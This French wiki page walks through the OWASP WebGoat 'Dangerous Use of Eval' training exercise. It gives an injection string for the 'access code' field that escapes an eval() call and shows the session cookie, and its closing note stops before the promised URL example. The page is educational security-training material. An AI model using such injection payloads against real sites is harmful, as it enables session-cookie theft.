OWASP WebGoat:Dangerous Use of Eval

From aldeid
Jump to navigation Jump to search

Dangerous Use of Eval

L'objectif de cet exercice est de vous sensibiliser aux dangers de la fonction eval().

Dans le présent exercice, il est demandé d'exploiter la fonction eval() pour afficher le cookie de session. Pour ce faire, il suffit d'envoyer la chaîne suivante dans le champ "access code" : 

123');alert(document.cookie);('

En effet, le contenu evalué devient ainsi : 

eval('123');
alert(document.cookie);
('');
Note
S'il est possible de procéder ainsi, il est néanmoins plus simple d'appeler directement la fonction javascript dans l'URL ainsi :

Retrieved from "https://www.aldeid.com/w/index.php?title=OWASP_WebGoat:Dangerous_Use_of_Eval&oldid=35499"